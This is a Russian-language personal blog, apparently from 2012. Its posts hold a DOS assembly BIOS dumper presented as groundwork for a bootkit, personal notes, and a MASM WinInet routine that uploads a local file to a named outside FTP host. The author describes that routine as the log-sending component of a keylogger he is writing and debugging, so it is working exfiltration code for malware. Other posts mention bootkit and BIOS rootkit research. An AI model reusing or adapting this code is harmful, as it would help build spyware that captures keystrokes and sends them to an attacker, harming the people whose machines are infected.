Последний пост в 2012.

Ну что друзья,вот и подошел к концу этот трудный, 2012 год.Сегодня, напоследок, я хочу выложить сорсы дампера биос вот к этой теме: тема.Вообще я хотел еще сегодня выложить микро наработку по загрузчику буткита,но мне кажется что я уже не успею потому что там еще только сектор написан и кусок джампера)))

Сорсы с комментами:



[bits 16]
segment code
..start:
mov ax, data ; настраиваем сегменты данных,стэка и его вершины.
mov ds, ax
mov ax, stack
mov ss, ax
mov sp, stacktop

mov dx, hello ; выводим сообщение
mov ah, 0x09
int 0x21

mov ah, 0x3C ; создаем файл через описатель
xor cx,cx
mov dx, fn
int 0x21
jnc createdfile ; если удалось-переходим к записи

mov dx, openerr ; если не удалось-оповестим о ошибке
mov ah, 0x09
int 0x21
jmp exit

createdfile:
mov [hfile], ax

mov bx, ax
mov ax, 0xF000 ; биос стартует отсюда
mov ds, ax
mov cx, 0xFFFF ; до сюда 
xor dx,dx
mov ah, 0x40 ; пишем в файл что по тем адресам
int 0x21
mov ax, data
mov ds, ax
jnc written ; удалось-записываем

mov dx, wrtnerr ; не удалось-выводим еррор
mov ah, 0x09
int 0x21

written:
mov bx, [hfile] ; закрываем файл
mov ah, 0x3E
int 0x21
jnc exit ; и выходим
mov dx, closerr ; ошибка закрытия
mov ah, 0x09
int 0x21

exit:
mov ax, 0x4c00 ; выход
int 0x21

segment data
hello: db 'I"ll dump bios to file', 0dh, 0ah, '$'
openerr: db 'File create error', 0dh, 0ah, '$'
wrtnerr: db 'File write error', 0dh, 0ah, '$'
closerr: db 'File close error', 0dh, 0ah, '$'
fn: db 'BIOS.ROM', 0
hfile: resw 1 ; описатель- слово

segment stack stack
resb 64 ; выделим под стэк 64 байта
stacktop:

Уходит пусть старый,злой год и приходит новый!

Всем хорошего праздника,позитива и веселья!УРА!!!

массовая ненависть

пост временно не должен здесь отображаться...

Немного отдыха)

Ну вот я тут.скоро сессия,а значит необходимо отдохнуть и завтра я со своим другом уезжаем в Киев на концерт Мэрилина Мэнсона,хуххх пока еще сидишь в этом месте трудно представить масштаб происходящего)надеюсь все будет круто и мы отлично оттопыремся за эти 3 дня что я там буду.
ну,а как приеду,надо работать,очень надо.я задумываюсь над микро-пассивным доходом,я не могу уделять достаточное кол-во времени кодингу и исследованиям,нужно что то глобальное.
фиу,до встречи!)

UPD:

последняя работа-процесс отладки кейлоггера:

слушайте такую музыку 

FTP upload на winapi

Взялся я тут за написание своего кейлоггера, логи решил отправлять на фтп, самый не плохой вариант по моему.С удивлением обнаружил что все что есть в интернете практически полностью реализовано на VCL, а так как я пишу логер на api то я не могу позволить себе использовать VCL, по этому я написал простую реализацию на ассемблере и библиотеке win inet которая поставляется в комплекте с вендой.


.386
.model flat,stdcall
option casemap:none

include include\windows.inc
include include\kernel32.inc
include include\user32.inc
include INCLUDE\wininet.inc

includelib lib\user32.lib
includelib lib\kernel32.lib
includelib LIB\wininet.lib

.data
file db 'C:\tes.txt',0 ; файл для залива
ftpfn db 'tes.txt',0 ; залитый файл

host db 'splashed.ucoz.ru',0  ; адрес фтп
login db 'login',0
password db 'password',0

agent db 'iexplore',0
hinet dd 0
hc dd 0


.code

start:

invoke InternetOpen,addr agent,INTERNET_OPEN_TYPE_PRECONFIG,NULL,NULL,0
mov hinet,eax

invoke InternetConnect,hinet,addr host,INTERNET_DEFAULT_FTP_PORT,addr login,addr password,INTERNET_SERVICE_FTP,INTERNET_FLAG_PASSIVE,0
mov hc,eax

invoke FtpPutFile,hc,addr file,addr ftpfn,FTP_TRANSFER_TYPE_BINARY,0

invoke InternetCloseHandle,hc
invoke InternetCloseHandle,hinet

invoke ExitProcess,0

end start

и мы не получаем вес как у коровы,а получаем 1.5 кб веса и работоспособный заливщик;)

Начинаем исследовать BIOS

Я появился хххххууууух.
4 дня я как тварь проел себе весь моск о том как же выдирать чертов биос и вот что я нашел:

1)биос таки попадает в память по адресу:
0F000h до адреса 0FFFFh.
именно это нам и надо читать.за 4 дня мне удалось извертеться так что пришлось использовать nasm для создания объектника и tlink для линковки в рабочую программу.

запустил я все это дерьмо на досе,который предварительно поставил на флешку.

И вот что мы имеем:

ванючий ром записывается!)))) еее у кого большие яйца?у меня большие яйца!хаха)

вот так вот.

сдампив свой биос я так же нашел в нем "сигнатуру" (ориентировка на китайский биос руткит)

такие вот дела.

скажем-с это первый шаг к автоматизации процесса шития биоса.

теперь сижу слушаю rage и думаю как все это дело под виндой запустить.может что то придумаю с запуском экзешника досового...если уж совсем лень будет.

да я ошибся когда думал что до адреса F000 не пустит. дальше FFFF не пустит.

такая вот херня.сорсы пока не выкладываю,они в уебищном виде,скажу только все оказалось проще чем я думал,но инфы крайне мало.после такого стресса я просто обязан отдохнуть немного,так что исходы через пару деньков;)

всем бай!

конфа

Ну что,вроде все не так жутко рассказал)хотя пересмотрев кое-где оговорился)

http://www.youtube.com/watch?v=fPgqStAt_d4&feature=youtu.be

про aes хуйню сморозил от волнения наверное.

256 битный алго значить 32 байтный значить максимальный ключ 64 символа,такое думаю не поломают...днем еще оговорю где я херь наморозил...

фее мне сегодня 20 исполнилось ебжишь,жизнь окончена)

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Contro l\Class\{36FC9E60-C465-11CF-8056-444553540000}

 UpperFilters и LowerFilters

немного о своем...

Фуф... на часах 2:17. Сижу в ванной,ноги парю,фэрвэкс пью,с подругой чатюсь...
В 12 звонил stokito, исправляли презентацию.через 10 часов я первый раз буду конференцию проводить,даже какое то волнение есть:-) спать как всегда 4 часа где то,потом надо бодрячком встать.

Есть у меня супер прикольная мысля в качестве очередного кодинга на асме,если найду аппаратуру все засвечу обязательно.так вроде все...настроение отстооойй. Споку.